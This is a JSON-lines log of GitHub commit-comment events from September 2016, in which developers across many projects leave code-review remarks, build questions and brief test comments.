{"id":"4615536185","type":"CommitCommentEvent","actor":{"login":"koluke"},"repo":{"name":"IolaniDev/iobot"},"payload":{"comment":{"id":19167019,"position":null,"line":null,"path":null,"commit_id":"1dc1cbc8b9b222ab648b3a9a6fcef1ef3c3a9f18","created_at":"2016-09-26T03:10:16Z","updated_at":"2016-09-26T03:10:16Z","body":"@Baddaboo I realized it right after I finished packaging and submitting the build to Apple for review LOL"}},"created_at":"2016-09-26T03:10:16Z"}
{"id":"4615537700","type":"CommitCommentEvent","actor":{"login":"Baddaboo"},"repo":{"name":"IolaniDev/iobot"},"payload":{"comment":{"id":19167024,"position":null,"line":null,"path":null,"commit_id":"1dc1cbc8b9b222ab648b3a9a6fcef1ef3c3a9f18","created_at":"2016-09-26T03:10:56Z","updated_at":"2016-09-26T03:10:56Z","body":"This is why these shouldn't be hardcoded values..."}},"created_at":"2016-09-26T03:10:56Z"}
{"id":"4615537825","type":"CommitCommentEvent","actor":{"login":"amesee"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19167025,"position":28,"line":28,"path":"pokemap.py","commit_id":"638d188b47e14d08b2a6ca27b594144066c42131","created_at":"2016-09-26T03:11:00Z","updated_at":"2016-09-26T03:11:00Z","body":"That means to format with 6 digits after the decimal point."}},"created_at":"2016-09-26T03:11:00Z"}
{"id":"4615541881","type":"CommitCommentEvent","actor":{"login":"gsherwood"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19167034,"position":26,"line":550,"path":"CodeSniffer.php","commit_id":"3df85dcb433e4dbc82a435554f717ca5958fd668","created_at":"2016-09-26T03:12:48Z","updated_at":"2016-09-26T03:12:48Z","body":"@jrfnl Thanks for that info.\r\n\r\nI wonder if a combination of getTestFiles() and getCliValues() could be used to locate test files in the format `SomethingUnitTest.[phpversion].php` and then set the correct CLI args (using `runtime-set` to temp set config vars) for each file.\r\n\r\nBoth of those methods from AbstractSniffUnitTest were almost certainly written too recently to have been used originally, but it feels like there may be an alternate solution now. But that would be a complete rewrite of the way the custom testing framework, so it's more a thought experiment I think :)"}},"created_at":"2016-09-26T03:12:48Z"}
{"id":"4615541981","type":"CommitCommentEvent","actor":{"login":"Akkarinage"},"repo":{"name":"rathena/FluxCP"},"payload":{"comment":{"id":19167035,"position":5,"line":14,"path":"config/application.php","commit_id":"fbfe99e7582df6f1f31cccfad1287709958c06b8","created_at":"2016-09-26T03:12:52Z","updated_at":"2016-09-26T03:12:52Z","body":"No idea where this came from. Sorry >_<;"}},"created_at":"2016-09-26T03:12:52Z"}
{"id":"4615544494","type":"CommitCommentEvent","actor":{"login":"zangetsudo"},"repo":{"name":"barijaona/CLOVER_GA-Z170X-Gaming5"},"payload":{"comment":{"id":19167040,"position":null,"line":null,"path":null,"commit_id":"dd8acc6c8de2104913653a970ae6d8183d3ef062","created_at":"2016-09-26T03:14:00Z","updated_at":"2016-09-26T03:14:00Z","body":"hi, barijaona\r\ngreat work!\r\nsorry i saw your post about ConfigMap at insanelymac :\r\nExcellent idea ! It worked for me !\r\n \r\n- In the ConfigMap entry, I replaced the string assigned to my board-ID (Mac-B809C3757DA9BB8D) with ‘none’\r\n- As an additional measure, I renamed the entry keyed ‘Config2’ to ‘Config9’ to better ensure that it will not be loaded\r\n\r\ni got the same problem about black screen and boot stop.\r\nhope your post can get my laptop work!"}},"created_at":"2016-09-26T03:14:00Z"}
{"id":"4615546743","type":"CommitCommentEvent","actor":{"login":"jcelliott"},"repo":{"name":"jcelliott/toniq"},"payload":{"comment":{"id":19167042,"position":null,"line":null,"path":null,"commit_id":"b32df755896203d8ee6e930c17505e4e10950389","created_at":"2016-09-26T03:15:05Z","updated_at":"2016-09-26T03:15:05Z","body":"These changes were for an experimental project that generated a lot of small jobs for background processing. I wanted to use Toniq because I liked the idea of keeping the jobs in memory and only using redis as a backup. Unfortunately, when restarting the application the Toniq process would crash trying to load all the jobs back into memory. I ended up using exq to get it work, but I'm still not convinced a job processing library was the right approach."}},"created_at":"2016-09-26T03:15:05Z"}
{"id":"4615547741","type":"CommitCommentEvent","actor":{"login":"koluke"},"repo":{"name":"IolaniDev/iobot"},"payload":{"comment":{"id":19167044,"position":null,"line":null,"path":null,"commit_id":"1dc1cbc8b9b222ab648b3a9a6fcef1ef3c3a9f18","created_at":"2016-09-26T03:15:33Z","updated_at":"2016-09-26T03:15:33Z","body":"I know, it's just that i ***love*** maintaining and building hacked-together code. /s"}},"created_at":"2016-09-26T03:15:33Z"}
{"id":"4615548606","type":"CommitCommentEvent","actor":{"login":"amesee"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19167047,"position":52,"line":86,"path":"fast_check.py","commit_id":"0fc133544476398123f9887c8002a3d4aab5e85d","created_at":"2016-09-26T03:15:55Z","updated_at":"2016-09-26T03:15:55Z","body":"It's mainly because `itertools.groupby` groups by requires the list to be sorted by the key function. It generates a new group any time the key changes. (Just like how `uniq` works in unix)."}},"created_at":"2016-09-26T03:15:55Z"}
{"id":"4615548986","type":"CommitCommentEvent","actor":{"login":"chillu"},"repo":{"name":"open-sausages/silverstripe-framework"},"payload":{"comment":{"id":19167048,"position":21,"line":54,"path":".travis.yml","commit_id":"e97ac2b518cc8d4a0a33a8024a5c914618bbffe2","created_at":"2016-09-26T03:16:06Z","updated_at":"2016-09-26T03:16:06Z","body":"I've removed this line, it duplicated a command above"}},"created_at":"2016-09-26T03:16:06Z"}
{"id":"4615549376","type":"CommitCommentEvent","actor":{"login":"kspar"},"repo":{"name":"pardiralli-dev/pardiralli"},"payload":{"comment":{"id":19167049,"position":null,"line":null,"path":null,"commit_id":"967c326821c14218a7b2cf80ecd4006f47a0dea1","created_at":"2016-09-26T03:16:16Z","updated_at":"2016-09-26T03:16:16Z","body":"First attempt to close #18. Won't be the last."}},"created_at":"2016-09-26T03:16:16Z"}
{"id":"4615549606","type":"CommitCommentEvent","actor":{"login":"MengjiaoZHU"},"repo":{"name":"MengjiaoZHU/mashup"},"payload":{"comment":{"id":19167050,"position":3,"line":23,"path":"README.md","commit_id":"df5def789217d8e8f8c97a2413e12eddb90f719c","created_at":"2016-09-26T03:16:22Z","updated_at":"2016-09-26T03:16:22Z","body":"This is linked with a google map api, which shows on the beginning of the homepage.\r\nThe map is centered in New York City."}},"created_at":"2016-09-26T03:16:22Z"}
{"id":"4615550008","type":"CommitCommentEvent","actor":{"login":"ajdamico"},"repo":{"name":"ajdamico/asdfree"},"payload":{"comment":{"id":19167051,"position":null,"line":null,"path":null,"commit_id":"79c5bca8acf16cda9a9907599cdbaca02e5594de","created_at":"2016-09-26T03:16:31Z","updated_at":"2016-09-26T03:16:31Z","body":"hahaha exactly"}},"created_at":"2016-09-26T03:16:31Z"}
{"id":"4615555020","type":"CommitCommentEvent","actor":{"login":"amesee"},"repo":{"name":"fampton/fast-poke"},"payload":{"comment":{"id":19167064,"position":69,"line":97,"path":"fast_check.py","commit_id":"0fc133544476398123f9887c8002a3d4aab5e85d","created_at":"2016-09-26T03:18:42Z","updated_at":"2016-09-26T03:18:42Z","body":"This is because the return value from `search_coord` returns a list of objects now instead of maps. See https://git.io/vixE5"}},"created_at":"2016-09-26T03:18:42Z"}
{"id":"4615556153","type":"CommitCommentEvent","actor":{"login":"marcofking1"},"repo":{"name":"Jire/Abendigo"},"payload":{"comment":{"id":19167066,"position":null,"line":null,"path":null,"commit_id":"6656a5739b45680316ea970c202ec1d317101a14","created_at":"2016-09-26T03:19:10Z","updated_at":"2016-09-26T03:19:10Z","body":"i got no hacks, can u help me pls"}},"created_at":"2016-09-26T03:19:10Z"}
{"id":"4615558349","type":"CommitCommentEvent","actor":{"login":"gaston-quispe"},"repo":{"name":"gaston-quispe/tpsisop"},"payload":{"comment":{"id":19167070,"position":null,"line":null,"path":null,"commit_id":"109b301d9c402aabe077e815b0a86230275e6222","created_at":"2016-09-26T03:20:08Z","updated_at":"2016-09-26T03:20:08Z","body":"Corrección de comentario: Arreglo una linea en initep.sh y agrego visualizacion de directorios al intentar reisntalar INSTALEP.sh"}},"created_at":"2016-09-26T03:20:08Z"}
{"id":"4615559134","type":"CommitCommentEvent","actor":{"login":"benladen"},"repo":{"name":"wisk/shovel_knight-doc"},"payload":{"comment":{"id":19167071,"position":null,"line":null,"path":null,"commit_id":"f372ef42457ab44848e3693c552939b7324c6e5b","created_at":"2016-09-26T03:20:24Z","updated_at":"2016-09-26T03:20:24Z","body":"It is useful, and could you make a pack.py to compress the files, i am not good at it. Thx first."}},"created_at":"2016-09-26T03:20:24Z"}
{"id":"4615561232","type":"CommitCommentEvent","actor":{"login":"dylanmckay"},"repo":{"name":"avr-rust/rust"},"payload":{"comment":{"id":19167075,"position":5,"line":305,"path":"mk/main.mk","commit_id":"9ee76e7b66f3bd2a5952052fdea670bdc58c71b5","created_at":"2016-09-26T03:21:21Z","updated_at":"2016-09-26T03:21:21Z","body":"Looking at the source code, the *ARC* in CARC stands for Automatic Reference Counting. When `objcarcopts` is enabled, LLVM runs the ARC optimisation passes, which could probably be useful in Rust.\r\n\r\nI can't find any mention of it in the Rust source code by `grep`ping though"}},"created_at":"2016-09-26T03:21:21Z"}
{"id":"4615566942","type":"CommitCommentEvent","actor":{"login":"ajdamico"},"repo":{"name":"gergness/srvyr"},"payload":{"comment":{"id":19167092,"position":null,"line":null,"path":null,"commit_id":"c054ea3f1dbbdfdaf49867ed98a7d2989908bd4b","created_at":"2016-09-26T03:23:50Z","updated_at":"2016-09-26T03:23:50Z","body":"hi, the finding that monetdblite goes 2x as fast as sqlite is a pretty strict function of your `num_obs <- c(1e5)` if you used `1e7`, the disparity would be much greater, and if you used `1e8` you would get bored of waiting for sqlite to complete.  check out the speed tests at the very bottom of http://monetdb.cwi.nl/testweb/web/sisyphus/fedora20-4/1474852098/speed.log.  you are correct that monetdb ignores indexes.  this is a great project, thanks for all your hard work.  cc @hannesmuehleisen\r\n\r\n"}},"created_at":"2016-09-26T03:23:50Z"}
{"id":"4615570405","type":"CommitCommentEvent","actor":{"login":"pomegranited"},"repo":{"name":"open-craft/edx-platform"},"payload":{"comment":{"id":19167130,"position":106,"line":172,"path":"common/static/common/js/discussion/discussion_router.js","commit_id":"a3f1c55ddc09130f194b8b5565aa445e96a8ee8d","created_at":"2016-09-26T03:25:23Z","updated_at":"2016-09-26T03:25:23Z","body":"nit: remove space between `{` and `trigger`."}},"created_at":"2016-09-26T03:25:23Z"}
{"id":"4615571472","type":"CommitCommentEvent","actor":{"login":"pomegranited"},"repo":{"name":"open-craft/edx-platform"},"payload":{"comment":{"id":19167132,"position":113,"line":176,"path":"common/static/common/js/discussion/discussion_router.js","commit_id":"a3f1c55ddc09130f194b8b5565aa445e96a8ee8d","created_at":"2016-09-26T03:25:52Z","updated_at":"2016-09-26T03:25:52Z","body":"nit: remove spaces between `{` and `trigger`, and between `true` and `}`."}},"created_at":"2016-09-26T03:25:52Z"}
{"id":"4615575261","type":"CommitCommentEvent","actor":{"login":"Baddaboo"},"repo":{"name":"IolaniDev/iobot"},"payload":{"comment":{"id":19167141,"position":null,"line":null,"path":null,"commit_id":"1dc1cbc8b9b222ab648b3a9a6fcef1ef3c3a9f18","created_at":"2016-09-26T03:27:29Z","updated_at":"2016-09-26T03:27:29Z","body":"When do you want me to fold in the code for the Iolani SDK? It's just a platform-agnostic bridge to attach backend providers as we need. I might also toss in some nice Core Data key-value store functions. We only have 3 months until Parse is fully deprecated fyi"}},"created_at":"2016-09-26T03:27:29Z"}
{"id":"4615575414","type":"CommitCommentEvent","actor":{"login":"mattyx14"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19167142,"position":null,"line":null,"path":null,"commit_id":"d89695c92ed6d37be4a39cd7b1f11b8c46ebf695","created_at":"2016-09-26T03:27:33Z","updated_at":"2016-09-26T03:27:33Z","body":"i remove pvp expert code and commit to lasted code"}},"created_at":"2016-09-26T03:27:33Z"}
{"id":"4615578347","type":"CommitCommentEvent","actor":{"login":"yuchima"},"repo":{"name":"yuchima/RecommendationEngine_ML"},"payload":{"comment":{"id":19167149,"position":null,"line":null,"path":null,"commit_id":"d49a66b38d5dc81cb2073ee327e1b3ab796665c7","created_at":"2016-09-26T03:28:46Z","updated_at":"2016-09-26T03:28:46Z","body":"Learning Machine Week 2 homework. "}},"created_at":"2016-09-26T03:28:46Z"}
{"id":"4615585681","type":"CommitCommentEvent","actor":{"login":"ararslan"},"repo":{"name":"JuliaLang/METADATA.jl"},"payload":{"comment":{"id":19167157,"position":19,"line":19,"path":".test/check-pr.jl","commit_id":"fef1c469647c3b8000ef15bdf0d55035c4194fde","created_at":"2016-09-26T03:31:48Z","updated_at":"2016-09-26T03:31:48Z","body":"Thanks for noticing and reporting the issue!"}},"created_at":"2016-09-26T03:31:48Z"}
{"id":"4615588308","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19167162,"position":null,"line":null,"path":null,"commit_id":"5990815818c0013fe268b11975bac3c9e23cef6e","created_at":"2016-09-26T03:32:54Z","updated_at":"2016-09-26T03:32:54Z","body":"https://github.com/TwistedScorpio/OTHire/commit/0aba7d733693999e9018661591806305cbbedb4f"}},"created_at":"2016-09-26T03:32:54Z"}
{"id":"4615588573","type":"CommitCommentEvent","actor":{"login":"TcanX0"},"repo":{"name":"OwenFan003/wechat_calculator"},"payload":{"comment":{"id":19167163,"position":null,"line":null,"path":null,"commit_id":"3c414392093a934080675d0b90c09fa5d0108f4a","created_at":"2016-09-26T03:33:03Z","updated_at":"2016-09-26T03:33:03Z","body":"###tcanx test\r\n\r\n"}},"created_at":"2016-09-26T03:33:03Z"}
{"id":"4615589077","type":"CommitCommentEvent","actor":{"login":"flowbish"},"repo":{"name":"illinois-cs241/illinois-cs241.github.io"},"payload":{"comment":{"id":19167164,"position":null,"line":null,"path":null,"commit_id":"0d1791600c70edeba72eafa1226d83620528262f","created_at":"2016-09-26T03:33:17Z","updated_at":"2016-09-26T03:33:17Z","body":"why did this actually make the malloc page render correctly (can somebody please explain ???)"}},"created_at":"2016-09-26T03:33:17Z"}
{"id":"4615589212","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19167165,"position":null,"line":null,"path":null,"commit_id":"0aba7d733693999e9018661591806305cbbedb4f","created_at":"2016-09-26T03:33:21Z","updated_at":"2016-09-26T03:33:21Z","body":"fixes here https://github.com/TwistedScorpio/OTHire/commit/5990815818c0013fe268b11975bac3c9e23cef6e"}},"created_at":"2016-09-26T03:33:21Z"}
{"id":"4615591990","type":"CommitCommentEvent","actor":{"login":"AlecKC"},"repo":{"name":"illinois-cs241/illinois-cs241.github.io"},"payload":{"comment":{"id":19167168,"position":null,"line":null,"path":null,"commit_id":"0d1791600c70edeba72eafa1226d83620528262f","created_at":"2016-09-26T03:34:36Z","updated_at":"2016-09-26T03:34:36Z","body":"Maybe it failed to build the first time and when you committed it rebuilt."}},"created_at":"2016-09-26T03:34:36Z"}
{"id":"4615595025","type":"CommitCommentEvent","actor":{"login":"flowbish"},"repo":{"name":"illinois-cs241/illinois-cs241.github.io"},"payload":{"comment":{"id":19167173,"position":null,"line":null,"path":null,"commit_id":"0d1791600c70edeba72eafa1226d83620528262f","created_at":"2016-09-26T03:36:00Z","updated_at":"2016-09-26T03:36:00Z","body":"yeah, probably something like that :angry: "}},"created_at":"2016-09-26T03:36:00Z"}
{"id":"4615595762","type":"CommitCommentEvent","actor":{"login":"TcanX0"},"repo":{"name":"OwenFan003/wechat_calculator"},"payload":{"comment":{"id":19167176,"position":1,"line":1,"path":"README.md","commit_id":"3c414392093a934080675d0b90c09fa5d0108f4a","created_at":"2016-09-26T03:36:20Z","updated_at":"2016-09-26T03:36:20Z","body":"**this is cool**\r\n_second best calculator in the eastern hemisphere_"}},"created_at":"2016-09-26T03:36:20Z"}
{"id":"4615598090","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19167180,"position":26,"line":550,"path":"CodeSniffer.php","commit_id":"3df85dcb433e4dbc82a435554f717ca5958fd668","created_at":"2016-09-26T03:37:24Z","updated_at":"2016-09-26T03:37:24Z","body":"@gsherwood Thanks for your thoughts!\r\nWill keep this in mind, but for now I don't think that will be possible as the sniff library also still supports PHPCS 1.x and that would mean the unit tests wouldn't be able to run for 1.x anymore.\r\n\r\nThe choice to still support PHPCS 1.x is a conscious one as the PHPCompatibility library is used when people either need to support various PHP versions or are upgrading software running on old PHP versions to newer ones. The \"old\" server where they initially want to run PHPCompatibility on might not be able to support the 2.x version.\r\n\r\nAdditionally, most tests need to be run against various versions (at least two) - one to check for the sniff showing a violation when support for a certain PHPversion (or range) is requested and one to check that the sniff does *not* show a violation when the requested PHPversion (or range) is higher (for new features) or lower (for old features).\r\n\r\nExample: the sniff checking for new functions should throw an error if `intdiv()` if used in combination with a `testVersion` setting which includes `7.0`, but if the requested support range does not include `7.0`, it should show noViolation.\r\n\r\nSo while I like the file name idea, I don't think it will solve the issue of unit testing this sniff library (yet)."}},"created_at":"2016-09-26T03:37:24Z"}
{"id":"4615599199","type":"CommitCommentEvent","actor":{"login":"powellb"},"repo":{"name":"powellb/seapy"},"payload":{"comment":{"id":19167183,"position":51,"line":664,"path":"lib.py","commit_id":"b2b7cdd1fba026372d028b3349f33a239d51e0c0","created_at":"2016-09-26T03:37:55Z","updated_at":"2016-09-26T03:37:55Z","body":"I believe that this is the way we want it. If no tolerance is zero or None, then it is set the minimum delta of a or b. If tolerance is specified, then it is the lesser between the specified tolerance or the delta. So, the 'if' clause is what I wanted from it. The question is if no tolerance is specified, maybe we should require a delta of 0...\r\n\r\n"}},"created_at":"2016-09-26T03:37:55Z"}
{"id":"4615602595","type":"CommitCommentEvent","actor":{"login":"7wusongsong"},"repo":{"name":"7wusongsong/repo"},"payload":{"comment":{"id":19167188,"position":null,"line":null,"path":null,"commit_id":"69abd56b4e1742c6b9fdb523e8c939171d6404a1","created_at":"2016-09-26T03:39:20Z","updated_at":"2016-09-26T03:39:20Z","body":"test\r\n\r\n"}},"created_at":"2016-09-26T03:39:20Z"}
{"id":"4615602837","type":"CommitCommentEvent","actor":{"login":"7wusongsong"},"repo":{"name":"7wusongsong/repo"},"payload":{"comment":{"id":19167189,"position":null,"line":null,"path":null,"commit_id":"69abd56b4e1742c6b9fdb523e8c939171d6404a1","created_at":"2016-09-26T03:39:27Z","updated_at":"2016-09-26T03:39:27Z","body":"test1"}},"created_at":"2016-09-26T03:39:27Z"}
{"id":"4615603870","type":"CommitCommentEvent","actor":{"login":"sky2day"},"repo":{"name":"krislox/Bank-Account"},"payload":{"comment":{"id":19167194,"position":null,"line":null,"path":null,"commit_id":"d46825ffd42b375c5c17033a47b93d6a60a520aa","created_at":"2016-09-26T03:39:55Z","updated_at":"2016-09-26T03:39:55Z","body":"Hi Van,\r\nI looked through your code and run the program. There are couple bugs in program behavior. I'll try to fix them today and will let you know.\r\nAndrei "}},"created_at":"2016-09-26T03:39:55Z"}
{"id":"4615603890","type":"CommitCommentEvent","actor":{"login":"chrisatomix"},"repo":{"name":"fatzebra/FatZebra-WooCommerce"},"payload":{"comment":{"id":19167195,"position":null,"line":null,"path":null,"commit_id":"8c2b8f6dcf3b443faee00db214cd4a5ce37dbfd4","created_at":"2016-09-26T03:39:56Z","updated_at":"2016-09-26T03:39:56Z","body":"Are all these error_log() calls needed here? We use BugSnag to capture any PHP errors on Production, will this record all payment attempts to the error log?\r\nMost plugins only write to the error_log when something has failed, or if WooCommerce debug mode is enabled."}},"created_at":"2016-09-26T03:39:56Z"}
{"id":"4615611190","type":"CommitCommentEvent","actor":{"login":"gsherwood"},"repo":{"name":"squizlabs/PHP_CodeSniffer"},"payload":{"comment":{"id":19167217,"position":26,"line":550,"path":"CodeSniffer.php","commit_id":"3df85dcb433e4dbc82a435554f717ca5958fd668","created_at":"2016-09-26T03:43:09Z","updated_at":"2016-09-26T03:43:09Z","body":"@jrfnl Yep, no way to use those method on 1.x, although I didn't change the requirements between 1.x and 2.x (I don't think, it was a while ago now 😄 ) so it should work. That's not the same for 3.x though, but I did try and keep the required PHP version as low as possible there.\r\n\r\nI do think the test file and CLI methods would be able to do what you're describing, as long as their is a solid naming convention for the files, but I'm not trying to push you in that direction and it would be a fair amount of work to try it out. I just wanted to see what sort of thing was being done to get ideas about additional flexibility for the test setup, and you've given me plenty of information to help there.\r\n\r\nThanks again."}},"created_at":"2016-09-26T03:43:09Z"}
{"id":"4615613143","type":"CommitCommentEvent","actor":{"login":"kspar"},"repo":{"name":"pardiralli-dev/pardiralli"},"payload":{"comment":{"id":19167221,"position":null,"line":null,"path":null,"commit_id":"7cb567a53bf7681906f3d2bd8ac1b7ec3a6397a5","created_at":"2016-09-26T03:44:02Z","updated_at":"2016-09-26T03:44:02Z","body":"Fixed subissue on #18: https://github.com/pardiralli-dev/pardiralli/issues/18#issuecomment-249471311"}},"created_at":"2016-09-26T03:44:02Z"}
{"id":"4615613330","type":"CommitCommentEvent","actor":{"login":"krislox"},"repo":{"name":"krislox/Bank-Account"},"payload":{"comment":{"id":19167223,"position":null,"line":null,"path":null,"commit_id":"d46825ffd42b375c5c17033a47b93d6a60a520aa","created_at":"2016-09-26T03:44:08Z","updated_at":"2016-09-26T03:44:08Z","body":"Thank you Andrei\n> On Sep 25, 2016, at 8:39 PM, sky2day <notifications@github.com <mailto:notifications@github.com>> wrote:\n> \n> Hi Van,\n> I looked through your code and run the program. There are couple bugs in program behavior. I'll try to fix them today and will let you know.\n> Andrei\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/krislox/Bank-Account/commit/d46825ffd42b375c5c17033a47b93d6a60a520aa#commitcomment-19167194>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AGqJLaYuF0luU8RwpM7O-NwG3ge-XU01ks5qtz6MgaJpZM4KGHNg>.\n> \n\n"}},"created_at":"2016-09-26T03:44:08Z"}
{"id":"4615613635","type":"CommitCommentEvent","actor":{"login":"brad0"},"repo":{"name":"lighttpd/lighttpd1.4"},"payload":{"comment":{"id":19167226,"position":null,"line":null,"path":null,"commit_id":"93afda9c8e6016dc132e6cac35a322be62b3cb03","created_at":"2016-09-26T03:44:15Z","updated_at":"2016-09-26T03:44:15Z","body":"So does DragonFly BSD 4.3+. NetBSD only has pipe2(), but lacks accept4()."}},"created_at":"2016-09-26T03:44:15Z"}
{"id":"4615614420","type":"CommitCommentEvent","actor":{"login":"DaniellPlasmmer"},"repo":{"name":"po-devs/android-client"},"payload":{"comment":{"id":19167229,"position":null,"line":null,"path":null,"commit_id":"763a69d89e2566e806f5f9090104af961d15ec04","created_at":"2016-09-26T03:44:36Z","updated_at":"2016-09-26T03:44:36Z","body":"As developers said, this commit includes chinese translation as issued here: #172."}},"created_at":"2016-09-26T03:44:36Z"}
{"id":"4615619051","type":"CommitCommentEvent","actor":{"login":"richchurcher"},"repo":{"name":"dev-academy-challenges/boilerplate-react-webpack"},"payload":{"comment":{"id":19167235,"position":null,"line":null,"path":null,"commit_id":"c1bc4d4ae3350c949b281b97515f0fea59b37166","created_at":"2016-09-26T03:46:35Z","updated_at":"2016-09-26T03:46:35Z","body":"That `/node_modules/` regex thing is unnecessary, I think. Oh well."}},"created_at":"2016-09-26T03:46:35Z"}
{"id":"4615623466","type":"CommitCommentEvent","actor":{"login":"csrl"},"repo":{"name":"hapijs/glue"},"payload":{"comment":{"id":19167244,"position":null,"line":null,"path":null,"commit_id":"67f8331326e11fb91c1ee0c4a99ac6c0ec310f5e","created_at":"2016-09-26T03:48:37Z","updated_at":"2016-09-26T03:48:37Z","body":"@devinivy  Only if loading a manifest without any plugin registrations."}},"created_at":"2016-09-26T03:48:37Z"}
{"id":"4615624326","type":"CommitCommentEvent","actor":{"login":"gstrauss"},"repo":{"name":"lighttpd/lighttpd1.4"},"payload":{"comment":{"id":19167248,"position":null,"line":null,"path":null,"commit_id":"93afda9c8e6016dc132e6cac35a322be62b3cb03","created_at":"2016-09-26T03:49:00Z","updated_at":"2016-09-26T03:49:00Z","body":"Thanks!  Good to know.  Please let me know if there are any issues with lighttpd on those platforms.  The code is not Linux-specific; it checks for various defines.  accept4() is used if SOCK_CLOEXEC and SOCK_NONBLOCK are defined by system headers.  pipe2() is used if O_CLOEXEC is defined by system headers."}},"created_at":"2016-09-26T03:49:00Z"}
{"id":"4615633424","type":"CommitCommentEvent","actor":{"login":"efiring"},"repo":{"name":"powellb/seapy"},"payload":{"comment":{"id":19167274,"position":51,"line":664,"path":"lib.py","commit_id":"b2b7cdd1fba026372d028b3349f33a239d51e0c0","created_at":"2016-09-26T03:53:06Z","updated_at":"2016-09-26T03:53:06Z","body":"I thought you wanted to allow the user to specify zero tolerance: in other words, a perfect match. For example, one grid every hour on the hour, and a second one every 10 minutes, perfectly synchronized, from which one wants only the hourly values. (This situation probably doesn't arise in practice.) If you don't, then you can leave this the way it is.  I chose the default tolerance to provide essentially nearest-neighbor interpolation to the coarser of the two grids.  This seems to me to be a good default--it is as permissive as it can be without using any data point more than once.  Whether it should be a maximum depends on whether the grids can be irregular, and whether, if they are, it is OK to use points more than once.\r\nFrom a pure code standpoint, `if tolerance is None:` is a standard idiom for handling kwargs like this; `if tolerance:` just looks wrong, because it is silently combining two cases: no tolerance kwarg was supplied, or it was supplied but with one particular value, 0, that is to be treated as if it were not supplied.  In the latter case, the user doesn't get what the user specifies, but there is no warning."}},"created_at":"2016-09-26T03:53:06Z"}
{"id":"4615635702","type":"CommitCommentEvent","actor":{"login":"ralcanta"},"repo":{"name":"ralcanta/hello-world"},"payload":{"comment":{"id":19167277,"position":13,"line":13,"path":"ArrayOfStrings","commit_id":"1509eac7765b9f759689ff87a21b7a8993561d12","created_at":"2016-09-26T03:54:11Z","updated_at":"2016-09-26T03:54:11Z","body":"da fuq"}},"created_at":"2016-09-26T03:54:11Z"}
{"id":"4615636325","type":"CommitCommentEvent","actor":{"login":"adamblu"},"repo":{"name":"adamblu/adamblu.github.io"},"payload":{"comment":{"id":19167278,"position":11,"line":29,"path":"index.html","commit_id":"b30ab3ac7ccd49a53a16ddf8219c8612e3db456b","created_at":"2016-09-26T03:54:29Z","updated_at":"2016-09-26T03:54:29Z","body":"here"}},"created_at":"2016-09-26T03:54:29Z"}
{"id":"4615636602","type":"CommitCommentEvent","actor":{"login":"adamblu"},"repo":{"name":"adamblu/adamblu.github.io"},"payload":{"comment":{"id":19167279,"position":62,"line":80,"path":"index.html","commit_id":"b30ab3ac7ccd49a53a16ddf8219c8612e3db456b","created_at":"2016-09-26T03:54:38Z","updated_at":"2016-09-26T03:54:38Z","body":"to here"}},"created_at":"2016-09-26T03:54:38Z"}
{"id":"4615637013","type":"CommitCommentEvent","actor":{"login":"adamblu"},"repo":{"name":"adamblu/adamblu.github.io"},"payload":{"comment":{"id":19167281,"position":3,"line":3,"path":"index.html","commit_id":"b30ab3ac7ccd49a53a16ddf8219c8612e3db456b","created_at":"2016-09-26T03:54:50Z","updated_at":"2016-09-26T03:54:50Z","body":"and here"}},"created_at":"2016-09-26T03:54:50Z"}
{"id":"4615638212","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19167287,"position":null,"line":null,"path":null,"commit_id":"a853c81f60d44ce107e7066c39105d963311dcef","created_at":"2016-09-26T03:55:23Z","updated_at":"2016-09-26T03:55:23Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-26T03:55:23Z"}
{"id":"4615639585","type":"CommitCommentEvent","actor":{"login":"pomegranited"},"repo":{"name":"open-craft/edx-platform"},"payload":{"comment":{"id":19167289,"position":6,"line":6,"path":"openedx/core/lib/xblock_builtin/xblock_discussion/static/js/mathjax_include.js","commit_id":"a3f1c55ddc09130f194b8b5565aa445e96a8ee8d","created_at":"2016-09-26T03:56:03Z","updated_at":"2016-09-26T03:56:03Z","body":"The `var MathJax` declaration is masking the `window.MathJax` that was defined by the loaded script, and so `MathJax` ends up `undefined`.  Please change this line to:\r\n\r\n`var setMathJaxDisplayDivSettings;`\r\n\r\nOr alternately, set `var MathJax = window.MathJax`;"}},"created_at":"2016-09-26T03:56:03Z"}
{"id":"4615639626","type":"CommitCommentEvent","actor":{"login":"BusyJay"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19167290,"position":9,"line":353,"path":"src/raftstore/store/peer.rs","commit_id":"9a608b309b6c7099da42e8d8af02a58d04dfb80b","created_at":"2016-09-26T03:56:04Z","updated_at":"2016-09-26T03:56:04Z","body":"I think both are ok. But we usually use `iter.filter().count()` in this case."}},"created_at":"2016-09-26T03:56:04Z"}
{"id":"4615644725","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19167301,"position":44,"line":341,"path":"src/Environments/Windows/msvcrt.xml","commit_id":"d4b324c3843b2b2314296fa2cb5a9b6d8bdb3416","created_at":"2016-09-26T03:58:25Z","updated_at":"2016-09-26T03:58:25Z","body":"`_initterm_e` returns `int`!"}},"created_at":"2016-09-26T03:58:25Z"}
{"id":"4615647059","type":"CommitCommentEvent","actor":{"login":"kurupmk59"},"repo":{"name":"kurupmk59/Java8Final"},"payload":{"comment":{"id":19167309,"position":5,"line":14,"path":"Java8Final/src/school/Calculator.java","commit_id":"305dd2b719f189433a4096620643fc6d6f92ff19","created_at":"2016-09-26T03:59:31Z","updated_at":"2016-09-26T03:59:31Z","body":"OK."}},"created_at":"2016-09-26T03:59:31Z"}
